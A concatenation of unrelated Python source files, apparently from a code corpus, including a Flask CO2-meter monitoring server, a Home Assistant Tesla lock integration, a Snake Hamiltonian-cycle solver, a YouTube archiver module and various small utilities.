abort_message = FNCI_API + " - Error Connecting to FNCI Server - " + (ENDPOINT_URL).split("codeinsight")[0] # Get rid of everything after codeinsight in url
logger.error(" %s" %(abort_message))
if FLASKAPP:
# Using error code 500 (Internal Server Error) to cover connection errors
# in the flask apps
abort(500, FNCI_API + " - %s" %abort_message)
else:
print(abort_message)
print("Is the FNCI server running?")
print("Exiting script")
sys.exit()
except requests.exceptions.RequestException as e: # Catch the exception for the logs but process below
logger.error(e)
# We at least received a response from FNCI so check the status to see
# what happened if there was an error or the expected data
if response.status_code == 200:
logger.debug(" Call to %s was successful." %FNCI_API)
return response.json()["Content: "]
elif response.status_code == 400:
# Bad Request
logger.error(" %s - Error: %s - Bad Request." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(400, FNCI_API + " - Bad Request - Look at debug log for more details")
else:
print("%s - Error: %s - Bad Request." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 401:
# Unauthorized Access
logger.error(" %s - Error: %s - Authentication Failed: JWT token is not valid or user does not have correct permissions." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(401, FNCI_API + " - Authentication Failed: JWT token is not valid or user does not have correct permissions.")
else:
print("%s - Error: %s - Authentication Failed: JWT token is not valid or user does not have correct permissions." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 404:
# Not Found
logger.error(" %s - Error: %s - URL endpoint not found: %s" %(FNCI_API, response.status_code, RESTAPI_URL ))
if FLASKAPP:
abort(400, FNCI_API + " - Bad Request - URL endpoint not found")
else:
print(" %s - Error: %s - URL endpoint not found: %s" %(FNCI_API, response.status_code, RESTAPI_URL ))
print(" Exiting script")
sys.exit()
elif response.status_code == 405:
# Method Not Allowed
logger.error(" %s - Error: %s - Method (GET/POST/PUT//DELETE/ETC) Not Allowed." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(405, FNCI_API + " - Method Not Allowed.")
else:
print(" %s - Error: %s - Method (GET/POST/PUT//DELETE/ETC) Not Allowed." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit()
elif response.status_code == 500:
# Internal Server Error
logger.error(" %s - Error: %s - Internal Server Error." %(FNCI_API, response.status_code ))
if FLASKAPP:
abort(500, FNCI_API + " - Internal Server Error.")
else:
print(" %s - Error: %s - Internal Server Error." %(FNCI_API, response.status_code ))
print(" Exiting script")
sys.exit() |
py | 7dfffd8849fca7065873e1c443229cceae14bda7 | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from typing import Generator
from core.config import settings
SQLALCHEMY_DATABASE_URL = settings.DATABASE_URL
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
def get_db_session() -> Generator:
try:
session = SessionLocal()
yield session
finally:
session.close()
|
py | 7dfffeecd3f631d488033a95b3c5cbfc2bfe44d4 | import eveapi
from apps.apies.models import CallGroup, Call, Api
from apps.characters.models import RefType
api = eveapi.EVEAPIConnection()
data = api.API.CallList()
def call_groups():
for group in data.callGroups:
try:
CallGroup.objects.create(
groupid=group.groupID,
name=group.name,
description=group.description,
)
except:
            print "Failed to create CallGroup %s" % group.name
def calls():
for call in data.calls:
if call.accessMask == 8388608:
            #no need for limited character info, or full access, or none
continue
try:
Call.objects.create(
accessmask=call.accessMask,
accounttype=call.type,
name=call.name,
callgroup=CallGroup.objects.get(groupid=call.groupID),
description=call.description,
)
except:
            print "Failed to create Call %s" % call.name
# extra = []
# for call in extra:
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CHARACTER,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
# Call.objects.create(
# accessmask=call.accessMask,
# accounttype=Api.CORPORATION,
# name=call.name,
# callgroup=CallGroup.objects.get(groupid=call.groupID),
# description=call.description,
# )
def reftypes():
for ref in api.eve.RefTypes().refTypes:
try:
RefType.objects.create(
reftypeid=ref.refTypeID,
reftypename=ref.refTypeName,
)
        except:
            print "Failed to create RefType %s" % ref.refTypeID
call_groups()
calls()
reftypes()
|
py | 7dffff5a5e0c6c04d63f336e946ce181bddbf650 | """Support for Tesla door locks."""
import logging
from homeassistant.components.lock import LockDevice
from homeassistant.const import STATE_LOCKED, STATE_UNLOCKED
from . import DOMAIN as TESLA_DOMAIN, TeslaDevice
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Tesla binary_sensors by config_entry."""
entities = [
TeslaLock(
device,
hass.data[TESLA_DOMAIN][config_entry.entry_id]["controller"],
config_entry,
)
for device in hass.data[TESLA_DOMAIN][config_entry.entry_id]["devices"]["lock"]
]
async_add_entities(entities, True)
class TeslaLock(TeslaDevice, LockDevice):
"""Representation of a Tesla door lock."""
def __init__(self, tesla_device, controller, config_entry):
"""Initialise of the lock."""
self._state = None
super().__init__(tesla_device, controller, config_entry)
async def async_lock(self, **kwargs):
"""Send the lock command."""
_LOGGER.debug("Locking doors for: %s", self._name)
await self.tesla_device.lock()
async def async_unlock(self, **kwargs):
"""Send the unlock command."""
_LOGGER.debug("Unlocking doors for: %s", self._name)
await self.tesla_device.unlock()
@property
def is_locked(self):
"""Get whether the lock is in locked state."""
return self._state == STATE_LOCKED
async def async_update(self):
"""Update state of the lock."""
_LOGGER.debug("Updating state for: %s", self._name)
await super().async_update()
self._state = STATE_LOCKED if self.tesla_device.is_locked() else STATE_UNLOCKED
|
py | 7dffffa7dafbb2d753501132ee68ab7e9b8e0930 | from flask import render_template, request
from app import db
from app.errors import bp
from app.api.errors import error_response as api_error_response
def wants_json_response():
return request.accept_mimetypes['application/json'] >= request.accept_mimetypes['text/html']
@bp.app_errorhandler(404)
def not_found_error(error):
if wants_json_response():
return api_error_response(404)
return render_template('errors/404.html'), 404
@bp.app_errorhandler(500)
def internal_error(error):
db.session.rollback()
if wants_json_response():
return api_error_response(500)
return render_template('errors/500.html'), 500
|
py | b4000147f7a6bdfe3d2250cb6dade7c64702593c | class UserNotFound(Exception):
def __init__(self, *args: object) -> None:
super().__init__(*args)
|
py | b40001e028877df677647b1c0e9d9201598b9faa | import logging
from ytarchiver.api import YoutubeChannel, APIError
from ytarchiver.common import Context, Event
from ytarchiver.download import generate_livestream_filename, generate_video_filename, DownloadError, \
LivestreamInterrupted
from ytarchiver.sqlite import Sqlite3Storage
def lookup(context: Context, is_first_run: bool):
statistics = _Statistics(
is_first_run=is_first_run,
monitor_livestreams=context.config.monitor_livestreams
)
context.livestream_recorders.update(context)
context.video_recorders.update(context)
with context.storage.open(context.config) as storage:
try:
channels = context.api.find_channels(context.config.channels_list)
for channel in channels:
_fetch_channel_content(context, channel, storage, statistics, is_first_run)
storage.commit()
except APIError:
context.logger.exception('error while making API call')
except DownloadError:
context.logger.exception('error while downloading')
except LivestreamInterrupted as e:
context.logger.error('livestream "{}" finished unexpectedly'.format(e.livestream_title))
except Exception:
context.logger.exception('unknown error')
statistics.announce(context.logger)
_process_events(context, is_first_run)
def _fetch_channel_content(
context: Context,
channel: YoutubeChannel,
storage: Sqlite3Storage, statistics,
is_first_run: bool=False):
_check_for_livestreams(context, channel, statistics, storage)
_check_for_videos(context, channel, is_first_run, statistics, storage)
def _check_for_livestreams(context: Context, channel: YoutubeChannel, statistics: '_Statistics', storage: Sqlite3Storage):
if not context.config.monitor_livestreams:
return
livestream = context.api.fetch_channel_livestream(channel)
if livestream is not None:
if not context.livestream_recorders.is_recording_active(livestream.video_id):
context.logger.info('new livestream "{}"'.format(livestream.title))
livestream.filename = generate_livestream_filename(context.config.output_dir, livestream)
context.bus.add_event(Event(type=Event.LIVESTREAM_STARTED, content=livestream))
context.livestream_recorders.start_recording(context, livestream)
storage.add_livestream(livestream)
statistics.notify_active_livestream()
def _check_for_videos(context: Context,
channel: YoutubeChannel,
is_first_run: bool,
statistics: '_Statistics',
storage: Sqlite3Storage):
for video in context.api.find_channel_uploaded_videos(channel, find_all=is_first_run):
video_not_registered = not storage.video_exist(video.video_id) and \
not context.video_recorders.is_recording_active(video.video_id)
if video_not_registered:
context.logger.info('new video "{}"'.format(video.title))
context.bus.add_event(Event(type=Event.NEW_VIDEO, content=video))
if not is_first_run or context.config.archive_all:
video.filename = generate_video_filename(context.config.output_dir, video)
context.video_recorders.start_recording(context, video)
storage.add_video(video)
statistics.notify_video(new=video_not_registered)
def _process_events(context: Context, is_first_run: bool):
try:
for event in context.bus.retrieve_events():
context.plugins.on_event(event, is_first_run)
except Exception:
context.logger.exception('exception in plugin')
class _Statistics:
def __init__(self, is_first_run: bool, monitor_livestreams: bool):
self.is_first_run = is_first_run
self.monitor_livestreams = monitor_livestreams
self.total_videos = 0
self.new_videos = 0
self.active_livestreams = 0
def notify_video(self, new: bool=False):
self.total_videos += 1
if new:
self.new_videos += 1
def notify_active_livestream(self):
self.active_livestreams += 1
def announce(self, logger: logging.Logger):
logger.info(
'{} videos: {}, new: {}, active livestreams: {}'.format(
'total' if self.is_first_run else 'fetched',
self.total_videos,
self.new_videos,
self.active_livestreams if self.monitor_livestreams else 'N/A'
)
)
|
py | b400041678c2e7c783f5faf989e95e7c5a1ab1a3 | from typing import Optional, List
from game.solvers.abstract import AbstractModel
from game.environment import action as act, tile
from game.environment.environment import Environment
from game.solvers.breadth_first_search_longest import \
BreadthFirstSearchLongestPath
from game.vector import Vector, to_direction_vectors
class HamiltonianCycle(AbstractModel):
"""
https://en.wikipedia.org/wiki/Hamiltonian_path
"""
def __init__(self):
super().__init__(
"Hamiltonian Cycle",
"hamiltonian_cycle",
"hc"
)
self._bfsl = BreadthFirstSearchLongestPath()
self._actions = []
self._i = 0
def build_cycle(self, env: Environment) -> Optional[List[Vector]]:
# Attempt to build the list of next actions
head = env.snake.head()
tail = env.snake.tail()
# We build a cycle by building the longest path from the snakes
# head to it's tail. If the snake is only 1 tile long, then we
# make an 'adjustment' and choose a tile next to the head
# as the target, essentially faking a tail.
# This is necessary as our algorithm won't return any actions
# if the from tile is the same as the target tile.
if head == tail:
if tail.x > 1:
adjustment = Vector(-1, 0)
else:
adjustment = Vector(1, 0)
tail = tail + adjustment
built = self._bfsl.longest_path(
env,
head,
tail,
env.snake.action.vector
)
if built is None:
return None
# We've built the longest path from head to tail, but we need to
# check that it covers all vectors.
if len(built) != env.available_tiles_count():
return None
built.append(head)
return built
def next_action(self, environment: Environment) -> act.Action:
# We calculate the cycle one and iterate over it
if not self._actions:
cycle_vectors = self.build_cycle(environment)
if not cycle_vectors:
# If we're not able to build them, it usually means there
# is no path to the fruit. Continue to any available position.
if environment.tile_at(environment.snake.head() + environment.snake.action.vector) != tile.EMPTY:
return environment.random_action()
return environment.snake.action
cycle_action_vectors = to_direction_vectors(cycle_vectors)
self._actions = act.vectors_to_action(cycle_action_vectors)
self._i = 0
# Keep looping over our list of actions
next_action = self._actions[self._i]
self._i += 1
if self._i == len(self._actions):
self._i = 0
return next_action
def reset(self):
self._bfsl.reset()
self._actions = []
self._i = 0
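# A short usage sketch (illustrative only; it assumes an already-constructed
# Environment instance, whose setup lives elsewhere in the game package). The
# solver lazily builds one Hamiltonian cycle on the first call to next_action()
# and afterwards simply replays the cycle's actions; in a real game loop each
# returned action would be applied to the environment between calls.
def _demo_actions(env: Environment, steps: int = 5) -> List[act.Action]:
    solver = HamiltonianCycle()
    return [solver.next_action(env) for _ in range(steps)]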
|
py | b40004b5c934d4662c1f10afcf656b54d9ed26c4 | # Copyright (c) 2020 Huawei Technologies Co., Ltd.
# [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dateutil.relativedelta import relativedelta
from datetime import datetime
from datetime import timedelta
import time
weekSet = []
from src.logger_setting.my_logger import get_logger
logger = get_logger()
def get_week_day(date):
week = datetime.strptime(date, "%Y%m%d").weekday()
return week
def add_days(date, num):
return (datetime.strptime(date, "%Y%m%d") + timedelta(days=num)).strftime("%Y%m%d")
def add_months(date, num):
return (datetime.strptime(date, "%Y%m%d") + relativedelta(months=num)).strftime("%Y%m%d")
def get_week_set(first_day, last_day):
week = get_week_day(first_day)
next_day = add_days(first_day, 7 - int(week))
if next_day > last_day:
if first_day < last_day:
weekSet.append(first_day)
weekSet.append(last_day)
else:
weekSet.append(first_day)
get_week_set(next_day, last_day)
return weekSet
def change_week_set(week_set):
if len(week_set) > 10:
if (datetime.strptime(week_set[1], "%Y%m%d") - datetime.strptime(week_set[0], "%Y%m%d")).days >= \
(datetime.strptime(week_set[10], "%Y%m%d") - datetime.strptime(week_set[9], "%Y%m%d")).days:
del week_set[10]
else:
del week_set[0]
return week_set
def is_in_time(date, first_day, last_day):
if first_day <= date < last_day:
return True
else:
return False
def get_time():
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
if __name__ == '__main__':
datetime_now = datetime.now()
print(get_week_set("20200101", "20200201"))
print((datetime.strptime(weekSet[4], "%Y%m%d") - datetime.strptime(weekSet[3], "%Y%m%d")).days >
(datetime.strptime(weekSet[1], "%Y%m%d") - datetime.strptime(weekSet[0], "%Y%m%d")).days)
print(is_in_time("20200513", "20200511", "20200518"))
print(is_in_time("20200513", "20200514", "20200518"))
|
py | b400050835399a3a910baf723395ff4fe9dff6eb | from kubeops_api.models.setting import Setting
http_prefix = 'http://'
https_prefix = 'https://'
def get_component_urls(cluster):
urls = {}
app_url = cluster.get_config("APP_DOMAIN").get('value')
if app_url:
urls = {
"grafana": http_prefix + "grafana." + app_url,
"prometheus": http_prefix + "prometheus." + app_url,
"registry-ui": http_prefix + "registry-ui." + app_url,
"dashboard": https_prefix + "dashboard." + app_url,
"traefik": http_prefix + "traefik." + app_url,
"scope": http_prefix + "scope.weave." + app_url,
"ceph": http_prefix + "ceph." + app_url
}
return urls
|
py | b400089450f8864df59c66c1b1389fee95e8a7d4 | from multiprocessing import Value, Lock
class SyncCounter:
def __init__(self, base_value=0):
self._lock = Lock()
self._value = Value('i', base_value)
@property
def ret_increment(self):
with self._lock:
ret_val = self._value.value
self._value.value += 1
return ret_val
@property
def value(self):
with self._lock:
ret_val = self._value.value
return ret_val
class ManagedSyncCounter(SyncCounter):
def __init__(self, manager, base_value=0):
self._lock, self._value = manager.Lock(), manager.Value('i', base_value)
|
py | b40008ca417f073f1f3ac83a9e3df157b63b6b67 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author: Wesley
# @time: 2020-12-11 10:48
import os
import cv2
from torchvision import transforms
from torch.utils.data import Dataset
class MyDataset(Dataset):
def __init__(self, img_path, mask_path):
super().__init__()
self.img_path = img_path
self.mask_path = mask_path
self.filename = []
for name in os.listdir(img_path):
self.filename.append(name.split('.')[0])
def __getitem__(self, index):
transform = transforms.Compose([
transforms.ToTensor()
])
image = transform(cv2.imread(os.path.join(self.img_path, self.filename[index] + '.jpg'), 1))
mask = transform(cv2.imread(os.path.join(self.mask_path, self.filename[index] + '.png'), 0))
return image, mask
def __len__(self):
return len(self.filename)
if __name__ == '__main__':
img_path = r'E:\PyCharmProject\datasets\5k\train_set\JPEGImages'
mask_path = r'E:\PyCharmProject\datasets\5k\train_set\SegmentationClass'
dataset = MyDataset(img_path, mask_path)
for img, mask in dataset:
print('img', img.shape)
print('mask', mask.shape)
|
py | b40008f4944df4262374b44890831af58675638c | from JumpScale import j
import JumpScale.baselib.circus
class CloudBroker(object):
def startInScreen(self):
j.tools.circus.manager.stopProcess('cloudbroker')
for item in ['byobu', 'screen']:
cmd = 'killall %s' % item
j.system.process.execute(cmd, dieOnNonZeroExitCode=False)
j.system.platform.screen.createSession('cloudbroker', ['appserver',])
print 'Starting cloudbroker appserver...'
path = j.system.fs.joinPaths(j.dirs.baseDir, 'apps', 'cloudbroker')
cmd = 'cd %s; python start_appserver.py' % path
j.system.platform.screen.executeInScreen('cloudbroker', 'appserver', cmd, wait=1)
if not j.system.net.waitConnectionTest('localhost', 9999, 30):
raise RuntimeError('Failed to start appserver') |
py | b400099077361cd01fbff115bb6b49825fb505fa | """ Flask server for CO2meter
(c) Vladimir Filimonov, 2018
E-mail: [email protected]
"""
import optparse
import logging
import threading
import time
import glob
import os
import socket
import signal
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import flask
from flask import request, render_template, jsonify
import pandas as pd
import co2meter as co2
_DEFAULT_HOST = '127.0.0.1'
_DEFAULT_PORT = '1201'
_DEFAULT_INTERVAL = 30 # seconds
_DEFAULT_NAME = 'co2'
_INIT_TIME = 30 # time to initialize and calibrate device
_URL = 'https://github.com/vfilimonov/co2meter'
_COLORS = {'r': '#E81F2E', 'y': '#FAAF4C', 'g': '#7FB03F'}
_IMG_G = '1324881/36358454-d707e2f4-150e-11e8-9bd1-b479e232f28f'
_IMG_Y = '1324881/36358456-d8b513ba-150e-11e8-91eb-ade37733b19e'
_IMG_R = '1324881/36358457-da3e3e8c-150e-11e8-85af-855571275d88'
_RANGE_MID = [800, 1200]
_CO2_MAX_VALUE = 3200 # Cut our yaxis here
_DEGREES_CELSIUS = "℃" # Unicode U+2103, Degree Celisus
_DEGREES_FAHRENHEIT = "℉" # Unicode U+2109, Degree Fahrenheit
_name = _DEFAULT_NAME
_fahrenheit = False
###############################################################################
mon = None
###############################################################################
app = flask.Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
###############################################################################
@app.route('/')
def home():
# Read CO2 and temp values
if mon is None:
status = '<h1 align="center" style="color:%s;">Device is not connected</h1>' % _COLORS['r']
else:
status = ''
try:
vals = list(mon._last_data)
vals[-1] = '%.1f' % vals[-1]
except:
data = read_logs()
vals = data.split('\n')[-2].split(',')
if status == '':
status = '<h1 align="center" style="color:%s;">Device is not ready</h1>' % _COLORS['r']
# Select image and color
if int(vals[1]) >= _RANGE_MID[1]:
color = _COLORS['r']
img = _IMG_R
elif int(vals[1]) < _RANGE_MID[0]:
color = _COLORS['g']
img = _IMG_G
else:
color = _COLORS['y']
img = _IMG_Y
co2 = '<font color="%s">%s ppm</font>' % (color, vals[1])
temperature = vals[2]
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
deg = _DEGREES_FAHRENHEIT
temperature = round(celsiusToFahrenheit(temperature), ndigits=1)
# Return template
return render_template('index.html', image=img, timestamp=vals[0],
co2=vals[1], color=color, temp=temperature, url=_URL,
status=status, degrees=deg)
#############################################################################
@app.route('/log', defaults={'logname': None})
@app.route('/log/<string:logname>')
def log(logname):
data = read_logs(name=logname)
return '<h1>Full log</h1>' + wrap_table(data)
@app.route('/log.csv', defaults={'logname': None})
@app.route('/log/<string:logname>.csv')
def log_csv(logname):
data = read_logs(name=logname)
return wrap_csv(data, logname)
@app.route('/log.json', defaults={'logname': None})
@app.route('/log/<string:logname>.json')
def log_json(logname):
data = read_logs(name=logname)
return wrap_json(data)
#############################################################################
@app.route('/rename')
def get_shape_positions():
args = request.args
    logging.info('rename %s', args.to_dict())
new_name = args.get('name', default=None, type=str)
if new_name is None:
return 'Error: new log name is not specified!'
global _name
_name = new_name
return 'Log name has changed to "%s"' % _name
#############################################################################
@app.route('/kill')
def shutdown():
server_stop()
global _monitoring
_monitoring = False
return 'Server shutting down...'
#############################################################################
# Dashboard on plotly.js
#############################################################################
def prepare_data(name=None, span='24H'):
data = read_logs(name)
data = pd.read_csv(StringIO(data), parse_dates=[0]).set_index('timestamp')
if span != 'FULL':
data = data.last(span)
global _fahrenheit
if _fahrenheit:
data['temp'] = data['temp'].apply(celsiusToFahrenheit)
if span == '24H':
data = data.resample('60s').mean()
elif span == '7D':
data = data.resample('600s').mean()
elif span == '30D':
data = data.resample('1H').mean()
elif span == 'FULL':
if len(data) > 3000: # Resample only long series
data = data.resample('1H').mean()
data = data.round({'co2': 0, 'temp': 1})
return data
def rect(y0, y1, color):
return {'type': 'rect', 'layer': 'below',
'xref': 'paper', 'x0': 0, 'x1': 1,
'yref': 'y', 'y0': y0, 'y1': y1,
'fillcolor': color, 'opacity': 0.2, 'line': {'width': 0}}
def caption(title, x, y):
return {'xref': 'paper', 'yref': 'paper', 'x': x, 'y': y, 'text': title,
'showarrow': False, 'font': {'size': 16},
'xanchor': 'center', 'yanchor': 'bottom'}
#############################################################################
@app.route("/chart/", strict_slashes=False)
@app.route("/chart/<name>", strict_slashes=False)
@app.route("/chart/<name>/<freq>", strict_slashes=False)
def chart_co2_temp(name=None, freq='24H'):
data = prepare_data(name, freq)
defaultTMin = 15
defaultTMax = 27
temperatureData = data['temp']
deg = _DEGREES_CELSIUS
global _fahrenheit
if _fahrenheit:
defaultTMin = 60
defaultTMax = 80
deg = _DEGREES_FAHRENHEIT
co2_min = min(500, data['co2'].min() - 50)
co2_max = min(max(2000, data['co2'].max() + 50), _CO2_MAX_VALUE)
t_min = min(defaultTMin, temperatureData.min())
t_max = max(defaultTMax, temperatureData.max())
rect_green = rect(co2_min, _RANGE_MID[0], _COLORS['g'])
rect_yellow = rect(_RANGE_MID[0], _RANGE_MID[1], _COLORS['y'])
rect_red = rect(_RANGE_MID[1], co2_max, _COLORS['r'])
# Check if mobile
try:
agent = request.headers.get('User-Agent')
phones = ['iphone', 'android', 'blackberry', 'fennec', 'iemobile']
staticPlot = any(phone in agent.lower() for phone in phones)
except RuntimeError:
staticPlot = False
# Make figure
index = data.index.format()
co2 = list(pd.np.where(data.co2.isnull(), None, data.co2))
temp = list(pd.np.where(data.temp.isnull(), None, data.temp))
d_co2 = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'CO2 concentration',
'xaxis': 'x1', 'yaxis': 'y1',
'x': index, 'y': co2}
d_temp = {'mode': 'lines+markers', 'type': 'scatter',
'name': 'Temperature',
'xaxis': 'x1', 'yaxis': 'y2',
'x': index, 'y': temp}
config = {'displayModeBar': False, 'staticPlot': staticPlot}
layout = {'margin': {'l': 30, 'r': 10, 'b': 30, 't': 30},
'showlegend': False,
'shapes': [rect_green, rect_yellow, rect_red],
'xaxis1': {'domain': [0, 1], 'anchor': 'y2'},
'yaxis1': {'domain': [0.55, 1], 'anchor': 'free', 'position': 0,
'range': [co2_min, co2_max]},
'yaxis2': {'domain': [0, 0.45], 'anchor': 'x1',
'range': [t_min, t_max]},
'annotations': [caption('CO2 concentration (ppm)', 0.5, 1),
caption(f'Temperature ({deg})', 0.5, 0.45)]
}
fig = {'data': [d_co2, d_temp], 'layout': layout, 'config': config}
return jsonify(fig)
#############################################################################
@app.route("/dashboard")
def dashboard_plotly():
# Get list of files
files = glob.glob('logs/*.csv')
files = [os.path.splitext(os.path.basename(_))[0] for _ in files]
# And find selected for jinja template
files = [(_, _ == _name) for _ in files]
return render_template('dashboard.html', files=files)
#############################################################################
# Monitoring routines
#############################################################################
def read_logs(name=None):
""" read log files """
if name is None:
name = _name
with open(os.path.join('logs', name + '.csv'), 'r') as f:
data = f.read()
return data
#############################################################################
def write_to_log(vals):
""" file name for a current log """
# Create file if does not exist
fname = os.path.join('logs', _name + '.csv')
if not os.path.exists('logs'):
os.makedirs('logs')
if not os.path.isfile(fname):
with open(fname, 'a') as f:
f.write('timestamp,co2,temp\n')
# Append to file
with open(fname, 'a') as f:
f.write('%s,%d,%.1f\n' % vals)
def read_co2_data():
""" A small hack to read co2 data from monitor in order to account for case
when monitor is not initialized yet
"""
global mon
if mon is None:
# Try to initialize
try:
mon = co2.CO2monitor()
# Sleep. If we read from device before it is calibrated, we'll
# get wrong values
time.sleep(_INIT_TIME)
except OSError:
return None
try:
return mon.read_data_raw(max_requests=1000)
except OSError:
        # Drop the handle so that the monitor is re-initialized on the next call
mon = None
return None
def monitoring_CO2(interval):
""" Tread for monitoring / logging """
while _monitoring:
# Request concentration and temperature
vals = read_co2_data()
if vals is None:
logging.info('[%s] monitor is not connected' % co2.now())
else:
# Write to log and sleep
logging.info('[%s] %d ppm, %.1f deg C' % tuple(vals))
write_to_log(vals)
# Sleep for the next call
time.sleep(interval)
#############################################################################
def start_monitor(interval=_DEFAULT_INTERVAL):
""" Start CO2 monitoring in a thread """
logging.basicConfig(level=logging.INFO)
global _monitoring
_monitoring = True
t = threading.Thread(target=monitoring_CO2, args=(interval,))
t.start()
return t
#############################################################################
def init_homekit_target(port, host):
try:
from .homekit import start_homekit
except:
from homekit import start_homekit
global mon
while mon is None:
time.sleep(5)
logging.info('Starting homekit server')
start_homekit(mon, host=host, port=port, monitoring=False, handle_sigint=False)
def init_homekit(port, host):
# We'll start homekit once the device is connected
t = threading.Thread(target=init_homekit_target, args=(port, host, ))
t.start()
#############################################################################
# Server routines
#############################################################################
def my_ip():
""" Get my local IP address """
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.connect(("8.8.8.8", 80)) # Google Public DNS
return s.getsockname()[0]
def start_server_homekit():
""" Start monitoring, flask/dash server and homekit accessory """
# Based on http://flask.pocoo.org/snippets/133/
try:
from .homekit import PORT
except:
# the case of running not from the installed module
from homekit import PORT
host = my_ip()
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % host,
default=host)
parser.add_option("-P", "--port-flask",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-K", "--port-homekit",
help="Port for the Homekit accessory [default %s]" % PORT,
default=PORT)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
options, _ = parser.parse_args()
global _name
_name = options.name
# Start monitoring
t_monitor = start_monitor()
# Start a thread that will initialize homekit once device is connected
init_homekit(host=options.host, port=int(options.port_homekit))
# Start server
app.run(host=options.host, port=int(options.port_flask))
#############################################################################
def start_server():
""" Runs Flask instance using command line arguments """
# Based on http://flask.pocoo.org/snippets/133/
parser = optparse.OptionParser()
parser.add_option("-H", "--host",
help="Hostname of the Flask app [default %s]" % _DEFAULT_HOST,
default=_DEFAULT_HOST)
parser.add_option("-P", "--port",
help="Port for the Flask app [default %s]" % _DEFAULT_PORT,
default=_DEFAULT_PORT)
parser.add_option("-I", "--interval",
help="Interval in seconds for CO2meter requests [default %d]" % _DEFAULT_INTERVAL,
default=_DEFAULT_INTERVAL)
parser.add_option("-N", "--name",
help="Name for the log file [default %s]" % _DEFAULT_NAME,
default=_DEFAULT_NAME)
parser.add_option("-m", "--nomonitoring",
help="No live monitoring (only flask server)",
action="store_true", dest="no_monitoring")
parser.add_option("-s", "--noserver",
help="No server (only monitoring to file)",
action="store_true", dest="no_server")
parser.add_option("-d", "--debug",
action="store_true", dest="debug",
help=optparse.SUPPRESS_HELP)
parser.add_option("-F", "--fahrenheit",
help="Show the temperature in Fahrenheit [default False]",
action="store_true",
default=False,
dest="fahrenheit")
options, _ = parser.parse_args()
if options.debug and not options.no_monitoring:
parser.error("--debug option could be used only with --no_monitoring")
global _name
_name = options.name
global _fahrenheit
_fahrenheit = options.fahrenheit
# Start monitoring
if not options.no_monitoring:
start_monitor(interval=int(options.interval))
# Start server
if not options.no_server:
app.run(debug=options.debug, host=options.host, port=int(options.port))
def stop_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
###############################################################################
def wrap_csv(data, fname='output'):
""" Make CSV response downloadable """
if fname is None:
fname = 'log'
si = StringIO(data)
output = flask.make_response(si.getvalue())
output.headers["Content-Disposition"] = "attachment; filename=%s.csv" % fname
output.headers["Content-type"] = "text/csv"
return output
def wrap_json(data):
""" Convert CSV to JSON and make it downloadable """
entries = [_.split(',') for _ in data.split('\n') if _ != '']
js = [{k: v for k, v in zip(['timestamp', 'co2', 'temp'], x)}
for x in entries[1:]]
return jsonify(js)
def wrap_table(data):
""" Return HTML for table """
res = ('<table><thead><tr><th>Timestamp</th><th>CO2 concentration</th>'
'<th>Temperature</th></tr></thead><tbody>')
for line in data.split('\n')[1:]:
res += '<tr>' + ''.join(['<td>%s</td>' % d for d in line.split(',')]) + '</tr>'
res += '</tbody></table>'
return res
###############################################################################
def celsiusToFahrenheit(c):
return (9 * float(c)) / 5 + 32
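# Worked example: celsiusToFahrenheit(22.5) -> 9 * 22.5 / 5 + 32 = 40.5 + 32 = 72.5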
###############################################################################
if __name__ == '__main__':
# start_server() will take care of start_monitor()
start_server()
# start_server_homekit()
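# Illustrative command lines (assuming this module is saved as server.py; all
# values are examples only), based on the optparse options defined in start_server():
#
#   python server.py                      # monitoring + web UI with the defaults
#   python server.py -N office -I 30      # log to logs/office.csv every 30 seconds
#   python server.py -m -P 8080           # web UI only, no monitoring thread
#   python server.py -s                   # monitoring/logging only, no web server
#   python server.py -F                   # report temperatures in Fahrenheit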
|
py | b40009a49693d223c8d2e190103c77ae77c5aa59 | #!/usr/bin/env python
#
# Copyright (c) 2001-2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
